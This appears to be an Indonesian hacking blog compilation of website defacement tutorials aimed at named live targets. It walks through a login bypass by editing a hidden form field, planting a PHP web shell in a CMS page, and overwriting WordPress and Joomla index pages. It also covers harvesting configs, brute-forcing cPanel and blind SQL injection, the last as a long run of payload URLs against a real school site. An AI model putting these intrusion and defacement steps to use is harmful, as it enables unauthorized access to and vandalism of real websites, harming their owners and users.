Cara Deface Web Dengan Bypass Admin Login

Cara Deface Web Dengan Bypass Admin Login

Assalamualaikum....

Salam kompak sobat2 Indonesian Blogger, ^_^

Tidak ada bosan2 nya ane mau share tentang depes2an,, soalnya lagi marak dan bnyak banget yg menyukai aktivitas ini, yah walaupun beresiko masuk BUI,, wkwkwk :p

Langsung aja lah, males ngetik banyak2! :p


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php




Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p



Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tebas index nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

<Line kosong>
<Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
<Line kosong>
<Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Harap Live Target ini jangan di Tebas om! Buat aja file baru!Atau Cari Target Lain!

Untuk yg belum mengerti cara tebas index web, silahkan Baca Cara Tebas Index Web

Content Creator By Onix AQua
Cara Tebas Index Website CMS Wordpress

Cara Tebas Index Website CMS Wordpress


Assalamualaikum,,,
Hadewh,, demi sobat-sobat Indonesian Blogger ane buatin nih Tutorial sederhana, biar pada ngerti,, wkwk :p
Langsung sajalah... Repot banget dah gitu males ngetik.. wkwkwk :p
Mohon Tutorial ini dibaca, diliat, dipahami dan dicermati baik2 yaahh,, ga ngerti ane jitaakk!! :3
ini untuk CMS Wordpress yah trus ane jg pake madspotshell,, jadi klo sobat pake shell yg lain pasti beda atuh :3

Notice! 
Kalo bisa index jangan dirusak! budayakan menghargai hasil kerja keras orang lain!

Dowload Madspotshell

Udah ah, langsung Buka Shellnya yah.. ;)


Saatnya nyari index nya,, dimana??? Dimana Dimana Dimana?? Hajiaahh! Malah nyanyi? -_- hehehe, santai ya sob, ;) Lihat Gambar! untuk mencari index nya sobat cuma perlu mencarinya di Path/folder utama website tsb. biasanya di Public_Html, klo ga ada, pokoknya dalemnya berisi file2 utama seperti: Wp-Login,Wp-Admin,Wp-Config, wp-content, dsb



Liat baik2 gambar diatas! di path utama berisikan semua files website! noh liat ada index.php, udah ketemu kan? kalo mau nyari config, klik aja wp-config.php :p
Ane harap, indexnya jangan dirusak, sebaiknya dibackup,, cukup upload aja file index.html  halaman deface sobat! atau  bisa juga index.php kita ubah. klik "R" di bagian kanan kemudian sobat rename aja jadi index.php_backup lalu klik [>>] untuk save!


Keterangan:

R : Rename
E : Edit
D : Download
X : Delete
[>>] : Eksekusi

selanjutnya buatlah file index.php yg baru lalu pastekan script deface sobat, dan save! liat gambar!



kalo sudah, langsung cek aja hasilnya,, :p hmm,, udah ah begitu aje kagak pelu repot2 :p


kalo ada yg ditanyakan, mampir aja di grup kami : New Team Cyber
Edited by bLacK_peArL
Content Created By Onix AQua
Cara Mencari Config dalam Website

Cara Mencari Config dalam Website

Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya CONFIG.

Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D

[+] BAHAN [+]



  • Shell (kalau belum punya download disini)
  • MySQL (kalau belum punya klik download) #recode 




1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com )

2. Klik EVAL didalam shell/backdoor kalian (lihat gambar)

3. Jika sudah, lalu klik GO (lihat gambar)
4. Lalu copy semua yang terdapat dalam kolom tersebut (lihat gambar)
5. Next, kalian klik CONFIG (tampilan seperti ini)
6. Lalu, paste kode yang kalian dapat (step 4) tadi di kolom yang disediakan (lihat gambar)
7. Lalu klik HAJAR, jika sukses tampilan kurang lebih akan seperti ini
8. Sekarang tinggal kalian panggil CONFIGnya, caranya 
# Jika kalian upload shell tadi di wp-content maka manggilnya http://domain.com/wp-content/config
*intinya ganti (nama shell kamu tadi dengan "config")
9. Jika sukses, tampilan akan seperti ini
10. Sekarang tinggal upload script "mysql.php"nya :)

Sekian tutorial dari ane ./Cyber404 , kalo kurang jelas bisa tanyakan pada (./Cyber404)

#yang belum tau cara deface dengan config silahkan kesini gan :)
#Special Thanks To : Mr. Gandrunx | X Inject

Cara Crack CPanel

Cara Crack CPanel

Kesempatan kali ini kai akan sedikit memberikan ulasan tentang cara crack cpanel atau "Cpanel BruteForce" saya umpamakan disini sobat Indonesian Blogger sudah mengetahui apa itu cpanel ya :D

Okelah, kita mulai langsung :D

[+] BAHAN [+]




  1. Shell, disini saya memakai Shell Gx173 (Download)
  2. Di Shell Gx173 sudah tersedia List Password, tapi bagi yang pake shell lain, bisa download (DISINI)
[+] LANGKAL LANGKAHNYA [+]
  1. Masuk Ke Shell sobat dahulu, untuk Shell Gx173 setelah di upload tekan TAB lalu masukan passwordnya ( Gx173 )
  2. Setelah masuk klik tombol Open dulu, lalu klik Cpanel Brute Force (tampilan akan seperti gambar dibawah ini)
     3. Kalian Klik tombol START
*untuk yang memakai Shell lain, maka masukin dulu list password yang udah di download tadi ke kolom pass
     4. Nah kalian tunggu deh sampek Proses cracking selesai, jika sudah maka akan muncul gambar seperti dibawah ini
      5. Selamat ^_^ User Dan Password Cpanel sudah berhasil kalian dapatkan:)
      6. Untuk login ke Cpanelnya yaitu lihat tulisan SERVER IP , di kananya Server Ip ada angka kan ? nah itu lah link login kita :)
Untuk Server IP  live target tersebut adalah : 174.120.60.251

nah sekarang bagaimana cara masuk ke halaman login ?
Sobat tinggal tambah aja port ini -> :2083 / :2082

*contoh ->  174.120.60.251:2083
maka tampilannya akan seperti ini
nah jika keluar seperti itu, tinggal masukin deh user + password sobat yang tadi didapat :)
Sekarang sobat sudah bisa masuk ke cpanel target :D
Sekarang terserah deh mau sobat pake apa :D
Sekia tutorial yang bisa kami berikan :) jika ada kesalahan kata kami minta maaf :)
Jika tutorial diatas kurang jelas, kalian bisa tanyakan ke grup kami di sini
Keyword : Crack Cpanel . Cari Cpanel , Hack Cpanel , Deface Cpanel , Mencari Cpanel , Cpanel untuk bot, Cpanel Brute Force

Edited by : bLack_peArL
Sumber : http://indocyberarmy.blogspot.com/2013/03/cara-cpanel-brute-force.html
Blind SQL Injection

Blind SQL Injection


Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...

 Apa sich Blind SQL Injection tu?



Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection
Edited by : bLacK_peArL
Source : http://indocyberarmy.blogspot.com/2013/02/blind-sql-injection.html
Cara Tebas Index Website CMS Joomla

Cara Tebas Index Website CMS Joomla

Ketemu lagi dengan tutorial semrawut dari ane ^o^, yoo kali ini ane mau share nih cara tebas INDEX dari CMS Joomla :D

Mengingat di Group masih banyak teman teman yang bertanya cara Tebas Index Joomla :D


Yuk, basa basinya udahan  kowkowkwk .

Oke simak dulu yah, nanti kalo belum faham baru tanya di Groups, atau di komentar ^_^

Saya anggap kalian udah ada live targetnya yah, kalo belum bisa dibaca disini


Oke langsung saja kita mulai.

1.  Kalian Klik Icon "TEMPLATE MANAGER" (see image)




2. Lalu klik "template" (see image)
3.  Lalu pilih template yang aktif di website tersebut.
4. Lalu klik "Edit Main Page Template" (see image)

5. Lalu pastekan "Shell/Script" kalian di kolom yang tersedia :D
#WARNING : Back Up dulu script asli website tersebut ^o^

6. Jeng jenggggggg !!!! sekarang cek deh hasilnya di Index websitenya ^_^

NB : Jika gagal, maka ulangin lagi dari step ke-3 :)

Sekian tutorial singkat dari saya :D. jika kurang jelas bisa kalian tanyakan

Content Creator By : Bimo Septiawan
Edited by bLacK_peArL
Sumber : http://indocyberarmy.blogspot.com/2013/03/cara-tebas-index-website-cms-joomla.html
Cara deface web dengan webdav buatan Hmei7 dan Lengkap step by step

Cara deface web dengan webdav buatan Hmei7 dan Lengkap step by step

Assalamualaikum Wr.Wb

Sesuai dengan judul posting kali ini , saya akan memberikan tutorial deface website menggunakan Webdav buatan Hmei7 . Sebenarnya tutorial ini sudah banyak sekali di mbah google , namun karena saya hanya ingin berbagi kepada yang belum bisa alangkah baiknya saya menuliskan tutorial ini . Langsung saja kita ke tutorial deface website menggunakan software Webdav .

Pertama , kalian harus download dulu software webdavnya di link dibawah ini :

Download Webdav via Mediafire ( 80 KB )

Setelah selesai download kalian matikan dulu anti virus di komputer / laptop anda ( supaya software bisa dibuka ) selanjutnya tinggal kalian buka filenya .

Kalau sudah dibuka tinggal klik tulisan " Webdav " lalu klik " Asp shell maker "


Setelah klik " Asp shell maker " anda akan melihat Program Webdav Shell Maker , jika sudah ada program Webdav Shell Maker anda klik tulisan " Setting ( untuk mengedit file / shell anda ) "
Setelah klik tulisan "Setting" edit tulisan /Hmei7.asp;.txt dengan tulisan anda contohnya ( /bLacK_.asp;.txt
 
sebenarnya tidak usah diedit juga tidak masalah ) setelah kalian edit tulisannya tinggal masukan target web / site korban . Caranya tinggal klik " Add Site " lalu masukan site korban ( contoh : http://www.odelagrange.com/ ) Jika sudah dimasukan web korban tinggal klik "Serang" ( tunggu sampai ada notice )
 checking : http://odelagrange.com
    shell created !!
    http://odelagrange.com/bLacK_.asp;.txt
Jika sudah muncul tulisannya tinggal copy hasil defacenya ( contoh : http://odelagrange.com/bLacK_.asp;.txt ) lanjut ke step berikutnya . Jika sudah dicopy tinggal paste di address bar anda ( Mozila , Google Chrome , IE , Opera Mini , dll ) lalu tekan enter .
Lalu setelah itu anda akan dialihkan ke situs http://odelagrange.com/bLacK_.asp;.txt dan saatnya anda untuk beraksi . Anda cari tulisan ( index.asp / index.html / index.htm / index.php / yang berhubungan dengan index gunakan ctrl+f supaya lebih mudah mencari ) pada contoh web http://odelagrange.com/bLacK_.asp;.txt ada tulisan " index.html " . 
Selanjutnya anda tinggal mengedit (klik gambar tanda seru untuk mengedit , jangan klik selain gambar itu ) data yang ada didalam file " index.html " dengan file / script deface anda ( jika belum punya silahkan 
download disini ) lalu klik " Kaydet / Save " . 
Jika data berhasil diedit maka ada tulisan " File Edited Successful:) " . 
Selamat anda telah berhasil mendeface website http://odelagrange.com Jika sudah success tinggal anda edit link / site target ( contoh : http://odelagrange.com/index.html biasanya jika /index.html dll bisa kena index dari web tersebut ) kemudian tekan enter di address bar anda . Jika halaman dari http://odelagrange.com/index.html berhasil maka akan ada script anda di web itu .
Jika anda ingin mencoba mengetahui apakah anda berhasil mendeface INDEX dari web tersebut caranya tinggal hapus saja tulisan /index.html (  contoh http://odelagrange.com/index.html ->
http://odelagrange.com/ )
NB : Jika masih belum mengerti bisa tuliskan yang belm dimengerti di kolom komentar .
Jika anda berhasil jangan lupa simpan nama bLacK_peArL di hasil deface / script anda , Terima Kasih .
" Tutorial di blog ini hanya sebagai pembelajaran , jadi jangan disalahgunakan "
Author : bLacK_peArL